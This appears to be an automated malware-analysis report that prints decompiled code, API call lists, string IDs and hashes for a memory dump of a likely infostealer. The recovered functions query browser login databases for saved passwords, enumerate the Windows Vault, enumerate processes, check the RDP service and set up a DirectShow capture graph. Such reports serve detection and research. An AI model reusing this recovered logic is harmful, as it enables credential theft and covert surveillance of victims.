                                  							_t190 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 1);
                                  							__eflags =  *_t190;
                                  							if( *_t190 != 0) {
                                  								E00403237( &_v48, E004034D1( &_v64, _t190));
                                  								E00405FEB(_v64);
                                  							}
                                  							_t191 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 2);
                                  							__eflags =  *_t191;
                                  							if( *_t191 != 0) {
                                  								E00403237( &_a12, E004034D1( &_v68, _t191));
                                  								E00405FEB(_v68);
                                  							}
                                  							_t192 =  *((intOrPtr*)(_t338 + 0x5c))(_v16, 3, _v32, _a8);
                                  							_t194 = E0040C6BD( *((intOrPtr*)(_t338 + 0x54))(), _t192, _v16, 3);
                                  							_t340 = _t340 - 0xc + 0x24;
                                  							E00403237( &_a16, E004034D1( &_v72, _t194));
                                  							E00405FEB(_v72);
                                  							_t198 = E0040319E( &_a12);
                                  							__eflags = _t198;
                                  							if(_t198 > 0) {
                                  								L26:
                                  								_v88 = 0;
                                  								_v84 = 0;
                                  								_v80 = 0;
                                  								__eflags = E0040319E( &_a4);
                                  								if(__eflags > 0) {
                                  									E00403549( &_v88, E004031AF( &_a4, __eflags,  &_v36));
                                  									E00405FEB(_v36);
                                  									_v36 = 0;
                                  								}
                                  								__eflags = E0040319E( &_a12);
                                  								if(__eflags > 0) {
                                  									E00403549( &_v84, E004031AF( &_a12, __eflags,  &_v40));
                                  									E00405FEB(_v40);
                                  									_v40 = 0;
                                  								}
                                  								__eflags = E0040319E( &_a16);
                                  								if(__eflags != 0) {
                                  									E00403549( &_v80, E004031AF( &_a16, __eflags,  &_v44));
                                  									E00405FEB(_v44);
                                  									_v44 = 0;
                                  								}
                                  								_t340 = _t340 - 0x10;
                                  								_v76 = _a20;
                                  								E00401FF2(_t340,  &_v88);
                                  								E00402028(_t338);
                                  								E00401441( &_v88);
                                  							} else {
                                  								_t223 = E0040319E( &_a16);
                                  								__eflags = _t223;
                                  								if(_t223 <= 0) {
                                  									goto L33;
                                  								}
                                  								goto L26;
                                  							}
                                  							L33:
                                  							E00405FEB(_a12);
                                  							E00405FEB(_v48);
                                  							E00405FEB(_t335);
                                  							E00405FEB(_a16);
                                  							_t178 =  *((intOrPtr*)(_t338 + 0x44))(_v16);
                                  							_pop(_t268);
                                  							_t331 = 1;
                                  							__eflags = _t178 - 0x64;
                                  						} while (_t178 == 0x64);
                                  						_t337 = _v28;
                                  						_t233 = _v52;
                                  						goto L35;
                                  					}
                                  					L11:
                                  					E0040373F(_t340,  &_v12);
                                  					E0041142A(_t268);
                                  					E0040373F(_t340,  &_v20);
                                  					E0041142A();
                                  					goto L12;
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00410CBB
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040BD0A
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040BD14
                                  • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0040BD28
                                  • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0040BD34
                                    • Part of subcall function 0040C63E: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C6A8
                                    • Part of subcall function 0040C63E: LocalFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C6B1
                                    • Part of subcall function 0040C6BD: LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040C745
                                    • Part of subcall function 0040C6BD: BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040C773
                                    • Part of subcall function 0040C6BD: LocalFree.KERNEL32(?), ref: 0040C7FB
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,74A313FB,?,00405B8D,.bss,00000000), ref: 004034DA
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                    • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                    • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,74A313FB,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                    • Part of subcall function 0040319E: lstrlenA.KERNEL32(00000000,004031C6,74A313FB,00000000,00000000, 6@,004033EE, 6@,00000000,-00000001,74A313FB,?,00403620,00000000,?,?), ref: 004031A5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileFreeLocal$Pathlstrlen$CopyExistslstrcat$AllocCryptDecryptFolderSpecialVirtuallstrcpy
                                  • String ID: .tmp$select signon_realm, origin_url, username_value, password_value from logins$select signon_realm, origin_url, username_value, password_value from wow_logins
                                  • API String ID: 881303001-3832748974
                                  • Opcode ID: 329386fcc83a84891d4b278b7fe8d1562402ffa047f16b59ee941d1b038bb962
                                  • Instruction ID: ba20cf8de6aee4928ce48004bd15a5688bda43775cfbd645d5ca8aed8c6f7f47
                                  • Opcode Fuzzy Hash: 329386fcc83a84891d4b278b7fe8d1562402ffa047f16b59ee941d1b038bb962
                                  • Instruction Fuzzy Hash: 9AD10B71900109ABDB05EFA6DC92AEEBB79EF44309F10413EF512B61E1DF389A45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E0040ACBE(void* __ecx) {
                                  				struct HINSTANCE__* _t17;
                                  				intOrPtr _t21;
                                  				intOrPtr _t24;
                                  				void* _t27;
                                  				void* _t45;
                                  
                                  				_t27 = __ecx;
                                  				_t45 = __ecx;
                                  				_t17 = LoadLibraryA("vaultcli.dll");
                                  				 *(_t45 + 0xc0) = _t17;
                                  				_t46 = _t17;
                                  				if(_t17 == 0) {
                                  					L7:
                                  					__eflags = 0;
                                  					return 0;
                                  				} else {
                                  					_push(_t27);
                                  					 *((intOrPtr*)(_t45 + 0x8c)) = E00411E88(_t17, "VaultOpenVault", _t46);
                                  					 *((intOrPtr*)(_t45 + 0x90)) = E00411E88( *(_t45 + 0xc0), "VaultCloseVault", _t46);
                                  					_t21 = E00411E88( *(_t45 + 0xc0), "VaultEnumerateItems", _t46);
                                  					_t43 = "VaultGetItem";
                                  					 *((intOrPtr*)(_t45 + 0x94)) = _t21;
                                  					 *((intOrPtr*)(_t45 + 0x98)) = E00411E88( *(_t45 + 0xc0), "VaultGetItem", _t46);
                                  					 *((intOrPtr*)(_t45 + 0x9c)) = E00411E88( *(_t45 + 0xc0), _t43, _t46);
                                  					_t24 = E00411E88( *(_t45 + 0xc0), "VaultFree", _t46);
                                  					 *((intOrPtr*)(_t45 + 0xa0)) = _t24;
                                  					if( *((intOrPtr*)(_t45 + 0x8c)) == 0 ||  *((intOrPtr*)(_t45 + 0x94)) == 0 ||  *((intOrPtr*)(_t45 + 0x90)) == 0 ||  *((intOrPtr*)(_t45 + 0x98)) == 0 || _t24 == 0) {
                                  						goto L7;
                                  					} else {
                                  						return 1;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0040ACC6
                                    • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoadlstrcmp
                                  • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                  • API String ID: 2493137890-3967309459
                                  • Opcode ID: 4f25305d574363695d8410a3db61320778bba206828fdc803e7d133c1409c789
                                  • Instruction ID: 2a90ba8d4adaf7cda04c615fa43a8d23c2bd42836fdc2a547e2a1ab5da71d687
                                  • Opcode Fuzzy Hash: 4f25305d574363695d8410a3db61320778bba206828fdc803e7d133c1409c789
                                  • Instruction Fuzzy Hash: 24114235A017018BD7249B71A801BDBB3E6AF85341F54893F986E97781DF38A882CB09
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E0040EFC1(void* __ecx, intOrPtr __edx) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				char* _t8;
                                  				void* _t11;
                                  				void* _t16;
                                  				short* _t19;
                                  
                                  				_t19 = 0;
                                  				_v8 = __edx;
                                  				_t16 = OpenSCManagerW(0, L"ServicesActive", 1);
                                  				if(_t16 != 0) {
                                  					_t11 = OpenServiceW(_t16, L"TermService", 4);
                                  					if(_t11 != 0) {
                                  						_t8 =  &_v12;
                                  						__imp__QueryServiceStatusEx(_t11, 0, _v8, 0x24, _t8);
                                  						_t19 = _t8;
                                  						CloseServiceHandle(_t11);
                                  					}
                                  					CloseServiceHandle(_t16);
                                  				}
                                  				return _t19;
                                  			}

                                  0x0040efcf
                                  0x0040efd1
                                  0x0040efdb
                                  0x0040efdf
                                  0x0040eff0
                                  0x0040eff4
                                  0x0040eff6
                                  0x0040f001
                                  0x0040f008
                                  0x0040f00a
                                  0x0040f00a
                                  0x0040f011
                                  0x0040f017
                                  0x0040f01d

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,00000000,?,?,?,0040E78B), ref: 0040EFD5
                                  • OpenServiceW.ADVAPI32(00000000,TermService,00000004,?,?,?,?,0040E78B), ref: 0040EFEA
                                  • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?,?,?,?,?,0040E78B), ref: 0040F001
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,0040E78B), ref: 0040F00A
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,0040E78B), ref: 0040F011
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandleOpen$ManagerQueryStatus
                                  • String ID: ServicesActive$TermService
                                  • API String ID: 2623946379-1374911754
                                  • Opcode ID: 197b1eab860f4328633b0e86db24ba8e6b1ce42e5468651c0bef0677bebd7986
                                  • Instruction ID: 13b6eb68be2015eef051f6e1ac84f9e35e5ae5cb34c12eee95212088573f76c3
                                  • Opcode Fuzzy Hash: 197b1eab860f4328633b0e86db24ba8e6b1ce42e5468651c0bef0677bebd7986
                                  • Instruction Fuzzy Hash: C4F0B472240310BBD7214BA5AC8DEEB7EBCEB8DB50B104175F701A2140DAB48D009668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00405DE9(void* __ecx) {
                                  				_Unknown_base(*)()* _t2;
                                  				void* _t4;
                                  
                                  				_t4 = __ecx;
                                  				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
                                  				if(_t4 == 0) {
                                  					if(_t2 != 0) {
                                  						_t2 =  *_t2(0, "An assertion condition failed", "Assert", 0x2010);
                                  					}
                                  					ExitProcess(1);
                                  				}
                                  				return _t2;
                                  			}

                                  0x00405def
                                  0x00405dfd
                                  0x00405e06
                                  0x00405e0a
                                  0x00405e1d
                                  0x00405e1d
                                  0x00405e21
                                  0x00405e21
                                  0x00405e27

                                  APIs
                                  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00405DF1
                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA,?,?,?,?,?,?,?,?,?,?,00405B9D,?,00000000,.bss), ref: 00405DFD
                                  • ExitProcess.KERNEL32 ref: 00405E21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressExitLibraryLoadProcProcess
                                  • String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
                                  • API String ID: 881411216-1361702557
                                  • Opcode ID: 665e447c18dd6cd14c29f9c8afe208bf82788663ec83304a93180c0f2cc759b1
                                  • Instruction ID: 25954cca20eb1c260ad7c814922471eb5b696a72d0fb51094525e610711aea92
                                  • Opcode Fuzzy Hash: 665e447c18dd6cd14c29f9c8afe208bf82788663ec83304a93180c0f2cc759b1
                                  • Instruction Fuzzy Hash: E5D017707C93003AEA1037A0AC4EFD737348B45B51F244462BA45A61D1C9E98986C9AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E004122CA(void* __ecx, void* __edx, void* __eflags) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				intOrPtr _v32;
                                  				int _v36;
                                  				intOrPtr _v40;
                                  				int _v44;
                                  				char _v568;
                                  				long _v596;
                                  				char _v600;
                                  				void* _v604;
                                  				char _v1644;
                                  				intOrPtr _t49;
                                  				int _t54;
                                  				struct tagPROCESSENTRY32W* _t57;
                                  				int _t73;
                                  				int _t77;
                                  				int _t89;
                                  				void* _t91;
                                  				void* _t112;
                                  				void* _t113;
                                  				void* _t115;
                                  				void* _t117;
                                  				signed int _t119;
                                  				void* _t120;
                                  				signed int _t122;
                                  				void* _t123;
                                  				intOrPtr* _t124;
                                  				void* _t125;
                                  
                                  				_t125 = __eflags;
                                  				_t112 = __edx;
                                  				_t91 = __ecx;
                                  				E00401052( &_v600, 0, 0x228);
                                  				_t124 = _t123 + 0xc;
                                  				_v604 = 0x22c;
                                  				_v36 = 0;
                                  				_t49 = 5;
                                  				_v32 = _t49;
                                  				_v40 = _t49;
                                  				E00401735( &_v44, _t125);
                                  				_t113 = CreateToolhelp32Snapshot(2, 0);
                                  				if(_t113 == 0xffffffff) {
                                  					L14:
                                  					E0040136C(_t91, __eflags,  &_v44);
                                  					_t54 = _v44;
                                  					__eflags = _t54;
                                  					if(_t54 != 0) {
                                  						_t119 =  *(_t54 - 4);
                                  						_t115 = _t119 * 0xc + _t54;
                                  						__eflags = _t119;
                                  						if(_t119 != 0) {
                                  							do {
                                  								_t115 = _t115 - 0xc;
                                  								E00401468(_t115);
                                  								_t119 = _t119 - 1;
                                  								__eflags = _t119;
                                  							} while (_t119 != 0);
                                  						}
                                  					}
                                  				} else {
                                  					_t57 =  &_v604;
                                  					Process32FirstW(_t113, _t57);
                                  					_t127 = _t57;
                                  					if(_t57 != 0) {
                                  						do {
                                  							_v16 = _v596;
                                  							_v12 = 0;
                                  							_v8 = 0;
                                  							E00403411( &_v12, _t112,  &_v568);
                                  							_t120 = OpenProcess(0x1410, 0, _v596);
                                  							__eflags = _t120 - 0xffffffff;
                                  							if(_t120 == 0xffffffff) {
                                  								E00403549( &_v8, E004036F7( &_v28, "-"));
                                  								E00405FEB(_v28);
                                  								_t34 =  &_v28;
                                  								 *_t34 = _v28 & 0x00000000;
                                  								__eflags =  *_t34;
                                  							} else {
                                  								E00401052( &_v1644, 0, 0x410);
                                  								_t124 = _t124 + 0xc;
                                  								_t77 =  &_v1644;
                                  								__imp__GetModuleFileNameExW(_t120, 0, _t77, 0x208);
                                  								__eflags = _t77;
                                  								if(_t77 == 0) {
                                  									E00403549( &_v8, E004036F7( &_v24, "-"));
                                  									E00405FEB(_v24);
                                  									_t29 =  &_v24;
                                  									 *_t29 = _v24 & 0x00000000;
                                  									__eflags =  *_t29;
                                  								} else {
                                  									E00403549( &_v8, E004036F7( &_v20,  &_v1644));
                                  									E00405FEB(_v20);
                                  									_v20 = _v20 & 0x00000000;
                                  								}
                                  								CloseHandle(_t120);
                                  							}
                                  							_t124 = _t124 - 0xc;
                                  							_t121 = _t124;
                                  							 *_t124 = _v16;
                                  							E0040373F(_t121 + 4,  &_v12);
                                  							E0040373F(_t121 + 8,  &_v8);
                                  							E00401612( &_v44);
                                  							E00401468( &_v16);
                                  							_t73 = Process32NextW(_t113,  &_v604);
                                  							_push(0);
                                  							_pop(0);
                                  							__eflags = _t73;
                                  						} while (__eflags != 0);
                                  						CloseHandle(_t113);
                                  						goto L14;
                                  					} else {
                                  						CloseHandle(_t113);
                                  						E0040136C(_t91, _t127,  &_v44);
                                  						_t89 = _v44;
                                  						if(_t89 != 0) {
                                  							_t122 =  *(_t89 - 4);
                                  							_t117 = _t122 * 0xc + _t89;
                                  							if(_t122 != 0) {
                                  								do {
                                  									_t117 = _t117 - 0xc;
                                  									E00401468(_t117);
                                  									_t122 = _t122 - 1;
                                  								} while (_t122 != 0);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t91;
                                  			}

                                  0x004122ca
                                  0x004122ca
                                  0x004122e5
                                  0x004122e7
                                  0x004122ec
                                  0x004122ef
                                  0x004122fc
                                  0x00412301
                                  0x00412302
                                  0x00412305
                                  0x00412308
                                  0x00412316
                                  0x0041231b
                                  0x004124a3
                                  0x004124a9
                                  0x004124ae
                                  0x004124b1
                                  0x004124b3
                                  0x004124b5
                                  0x004124bb
                                  0x004124bd
                                  0x004124bf
                                  0x004124c1
                                  0x004124c1
                                  0x004124c6
                                  0x004124cb
                                  0x004124cb
                                  0x004124cb
                                  0x004124c1
                                  0x004124bf
                                  0x00412321
                                  0x00412321
                                  0x00412329
                                  0x0041232f
                                  0x00412331
                                  0x00412374
                                  0x0041237d
                                  0x00412387
                                  0x0041238a
                                  0x0041238d
                                  0x004123a4
                                  0x004123a6
                                  0x004123a9
                                  0x00412440
                                  0x00412448
                                  0x0041244d
                                  0x0041244d
                                  0x0041244d
                                  0x004123af
                                  0x004123bd
                                  0x004123c2
                                  0x004123c5
                                  0x004123d4
                                  0x004123da
                                  0x004123dc
                                  0x00412415
                                  0x0041241d
                                  0x00412422
                                  0x00412422
                                  0x00412422
                                  0x004123de
                                  0x004123f1
                                  0x004123f9
                                  0x004123fe
                                  0x004123fe
                                  0x00412427
                                  0x00412427
                                  0x00412454
                                  0x00412457
                                  0x00412459
                                  0x00412462
                                  0x0041246e
                                  0x00412476
                                  0x0041247e
                                  0x0041248b
                                  0x00412491
                                  0x00412493
                                  0x00412494
                                  0x00412494
                                  0x0041249d
                                  0x00000000
                                  0x00412333
                                  0x00412334
                                  0x00412340
                                  0x00412345
                                  0x0041234a
                                  0x00412350
                                  0x00412356
                                  0x0041235a
                                  0x00412360
                                  0x00412360
                                  0x00412365
                                  0x0041236a
                                  0x0041236a
                                  0x0041236f
                                  0x0041235a
                                  0x0041234a
                                  0x00412331
                                  0x004124d6

                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412310
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412329
                                  • CloseHandle.KERNEL32(00000000), ref: 00412334
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 0041239E
                                  • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 004123D4
                                  • CloseHandle.KERNEL32(00000000), ref: 00412427
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0041248B
                                  • CloseHandle.KERNEL32(00000000), ref: 0041249D
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$Process32lstrcpylstrlen$CreateFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32Virtual
                                  • String ID:
                                  • API String ID: 3514491001-0
                                  • Opcode ID: 1ee9c4b895ebd49d63df65d356c6f6dd768b9f1af522058275ca50f077a8b9ef
                                  • Instruction ID: 76f310ec451ec7d85fc7bdc68f8874500a32d320933bf00d65e3e2fac8afd17e
                                  • Opcode Fuzzy Hash: 1ee9c4b895ebd49d63df65d356c6f6dd768b9f1af522058275ca50f077a8b9ef
                                  • Instruction Fuzzy Hash: 86519472D00219ABCB10EBA5CD49AEF7B78AF54719F00017AF405B32D0DB789E85CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00412155(WCHAR** __ecx) {
                                  				short _v524;
                                  				intOrPtr _v552;
                                  				void* _v560;
                                  				struct tagPROCESSENTRY32W* _t8;
                                  				WCHAR* _t9;
                                  				WCHAR** _t17;
                                  				void* _t19;
                                  
                                  				_t17 = __ecx;
                                  				_v560 = 0x22c;
                                  				_t19 = CreateToolhelp32Snapshot(2, 0);
                                  				if(_t19 == 0xffffffff) {
                                  					L6:
                                  					return 0;
                                  				}
                                  				_t8 =  &_v560;
                                  				Process32FirstW(_t19, _t8);
                                  				while(_t8 != 0) {
                                  					_t9 = CharLowerW( *_t17);
                                  					if(lstrcmpW(CharLowerW( &_v524), _t9) == 0) {
                                  						CloseHandle(_t19);
                                  						return _v552;
                                  					}
                                  					_t8 = Process32NextW(_t19,  &_v560);
                                  				}
                                  				CloseHandle(_t19);
                                  				goto L6;
                                  			}

                                  0x00412164
                                  0x00412166
                                  0x00412176
                                  0x0041217b
                                  0x004121c7
                                  0x00000000
                                  0x004121c7
                                  0x0041217d
                                  0x00412185
                                  0x004121bc
                                  0x0041218f
                                  0x004121ac
                                  0x004121ce
                                  0x00000000
                                  0x004121d4
                                  0x004121b6
                                  0x004121b6
                                  0x004121c1
                                  0x00000000

                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412170
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412185
                                  • CharLowerW.USER32(00000000), ref: 0041218F
                                  • CharLowerW.USER32(?), ref: 0041219D
                                  • lstrcmpW.KERNEL32(00000000,?,00000000), ref: 004121A4
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 004121B6
                                  • CloseHandle.KERNEL32(00000000), ref: 004121C1
                                  • CloseHandle.KERNEL32(00000000), ref: 004121CE
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CharCloseHandleLowerProcess32$CreateFirstNextSnapshotToolhelp32lstrcmp
                                  • String ID:
                                  • API String ID: 1363071124-0
                                  • Opcode ID: 7127dcae3be97b314b06170a2d2ab854ee7541e6bcbe1cc0915e3935ee5c82da
                                  • Instruction ID: 4666fb41372ad6f73eaae79bd09a069f05ab8e19623d47d36fdabbe8d344061e
                                  • Opcode Fuzzy Hash: 7127dcae3be97b314b06170a2d2ab854ee7541e6bcbe1cc0915e3935ee5c82da
                                  • Instruction Fuzzy Hash: 9B018F71505224BBD711ABB4AC4CEDF7BBCEB09351F1481A1FA01D2290D77889928B7D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 52%
                                  			E00414CB1(signed int __ecx, signed int _a4) {
                                  				intOrPtr _v38;
                                  				intOrPtr _v44;
                                  				intOrPtr _v48;
                                  				void* _v112;
                                  				char _v128;
                                  				intOrPtr _v132;
                                  				char _v200;
                                  				intOrPtr _t49;
                                  				intOrPtr* _t54;
                                  				intOrPtr* _t58;
                                  				intOrPtr* _t60;
                                  				intOrPtr* _t71;
                                  				signed int _t76;
                                  				intOrPtr* _t78;
                                  				intOrPtr* _t79;
                                  				intOrPtr* _t80;
                                  				intOrPtr* _t85;
                                  				signed int _t91;
                                  				intOrPtr* _t96;
                                  				intOrPtr* _t97;
                                  				intOrPtr* _t104;
                                  				signed int _t107;
                                  				intOrPtr* _t111;
                                  				intOrPtr* _t112;
                                  				intOrPtr* _t113;
                                  				intOrPtr* _t118;
                                  				void* _t119;
                                  				void* _t120;
                                  				void* _t121;
                                  
                                  				_t76 = __ecx;
                                  				__imp__CoInitialize(0);
                                  				_t111 = __ecx + 0x18;
                                  				__imp__CoCreateInstance(0x4175c0, 0, 1, 0x41a79c, _t111);
                                  				_t78 =  *_t111;
                                  				if(_t78 != 0) {
                                  					_t104 = __ecx + 0x1c;
                                  					_t49 =  *((intOrPtr*)( *_t78))(_t78, 0x4175a0, _t104);
                                  					_t79 =  *_t104;
                                  					if(_t79 != 0) {
                                  						_t49 =  *((intOrPtr*)( *_t79 + 4))(_t79);
                                  						_t112 = __ecx + 0x20;
                                  						if(_t112 != 0) {
                                  							_t49 = E00414A12(_a4, _t112);
                                  						}
                                  						if( *_t112 != 0) {
                                  							_t113 = _t76 + 0x24;
                                  							__imp__CoCreateInstance(0x417610, 0, 1, 0x41a78c, _t113);
                                  							_t80 =  *_t113;
                                  							if(_t80 != 0) {
                                  								 *((intOrPtr*)( *_t80 + 0xc))(_t80,  *((intOrPtr*)(_t76 + 0x20)), L"Source");
                                  								_t54 =  *_t113;
                                  								 *((intOrPtr*)( *_t54 + 0xc))(_t54,  *_t104, L"Grabber");
                                  								E00401052( &_v128, 0, 0x48);
                                  								_t58 =  *((intOrPtr*)(_t76 + 0x18));
                                  								_t121 = _t120 + 0xc;
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								 *((intOrPtr*)( *_t58 + 0x10))(_t58,  &_v128);
                                  								_t49 = E0041462F();
                                  								 *((intOrPtr*)(_t76 + 0x28)) = _t49;
                                  								if(_t49 != 0) {
                                  									_t49 = E0041464B();
                                  									 *((intOrPtr*)(_t76 + 0x2c)) = _t49;
                                  									if(_t49 != 0) {
                                  										_t85 =  *((intOrPtr*)(_t76 + 0x24));
                                  										_t49 =  *((intOrPtr*)( *_t85 + 0x2c))(_t85,  *((intOrPtr*)(_t76 + 0x28)), _t49);
                                  										if(_t49 >= 0) {
                                  											_t60 =  *((intOrPtr*)(_t76 + 0x18));
                                  											 *((intOrPtr*)( *_t60 + 0x14))(_t60,  &_v200);
                                  											E0040102C(_t119 + _v132 + 0x30 - _v132 - 0x60, _v132 + 0x30, 0x28);
                                  											E00414492( &_v200);
                                  											_t107 = _a4;
                                  											E00414AD1(_t76, _v132 + 0x30, _t107, _v44, _v48, _v38);
                                  											E00405DE9(_t76 & 0xffffff00 | _t107 -  *((intOrPtr*)(_t76 + 0xc)) > 0x00000000);
                                  											_t91 = 7;
                                  											memcpy(_t121 + 0xc - 0x1c,  *( *((intOrPtr*)(_t76 + 4)) + _t107 * 4), _t91 << 2);
                                  											E0041457F( *_t76);
                                  											_t49 = E0041462F();
                                  											 *((intOrPtr*)(_t76 + 0x30)) = _t49;
                                  											if(_t49 != 0) {
                                  												_t71 =  *((intOrPtr*)(_t76 + 0x18));
                                  												 *((intOrPtr*)( *_t71 + 0x24))(_t71,  *_t76, 0);
                                  												_t96 =  *((intOrPtr*)(_t76 + 0x24));
                                  												_t118 = _t76 + 0x34;
                                  												_t49 =  *((intOrPtr*)( *_t96))(_t96, 0x4175e0, _t118);
                                  												_t97 =  *_t118;
                                  												if(_t97 != 0) {
                                  													return  *((intOrPtr*)( *_t97 + 0x1c))(_t97);
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t49;
                                  			}

                                  Instruction addresses (one per C-code line, in order): 0x00414cbf, 0x00414cc1, 0x00414cc7, 0x00414cd9, 0x00414cdf, 0x00414ce3, 0x00414ceb, 0x00414cf5, 0x00414cf7, 0x00414cfb, 0x00414d04, 0x00414d07, 0x00414d0c, 0x00414d13, 0x00414d13, 0x00414d1b, 0x00414d21, 0x00414d33, 0x00414d39, 0x00414d3d, 0x00414d4e, 0x00414d51, 0x00414d5d, 0x00414d68, 0x00414d72, 0x00414d78, 0x00414d7e, 0x00414d81, 0x00414d82, 0x00414d83, 0x00414d8c, 0x00414d8d, 0x00414d8e, 0x00414d8f, 0x00414d92, 0x00414d98, 0x00414d9d, 0x00414da2, 0x00414dab, 0x00414db0, 0x00414db5, 0x00414dbb, 0x00414dc5, 0x00414dca, 0x00414dd0, 0x00414ddd, 0x00414df2, 0x00414e00, 0x00414e08, 0x00414e14, 0x00414e1f, 0x00414e2f, 0x00414e32, 0x00414e36, 0x00414e3e, 0x00414e43, 0x00414e48, 0x00414e4a, 0x00414e54, 0x00414e57, 0x00414e5a, 0x00414e66, 0x00414e68, 0x00414e6c, 0x00000000, 0x00414e71, 0x00414e6c, 0x00414e48, 0x00414dca, 0x00414db5, 0x00414da2, 0x00414d3d, 0x00414d1b, 0x00414cfb, 0x00414e78

                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 00414CC1
                                  • CoCreateInstance.OLE32(004175C0,00000000,00000001,0041A79C,?), ref: 00414CD9
                                  • CoCreateInstance.OLE32(00417610,00000000,00000001,0041A78C,?), ref: 00414D33
                                    • Part of subcall function 00414A12: CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?), ref: 00414A40
                                  Strings
